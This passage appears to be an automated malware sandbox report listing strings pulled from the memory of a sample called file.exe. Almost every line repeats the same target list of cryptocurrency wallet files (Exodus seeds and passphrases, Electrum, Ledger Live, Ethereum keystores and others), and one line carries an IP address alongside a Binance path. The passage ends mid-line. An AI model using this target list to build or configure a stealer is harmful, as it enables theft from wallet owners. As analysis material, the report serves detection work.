Source: file.exe, 00000000.00000002.2662760280.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2662760280.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2662760280.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2662760280.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2662760280.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2662760280.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2662760280.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2662760280.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2662760280.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2662001774.0000000000692000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 185.215.113.16gineer\AppData\Roaming\Binance\.finger-print.fp
Source: file.exe, 00000000.00000002.2662760280.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2662760280.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2662760280.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2662760280.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger 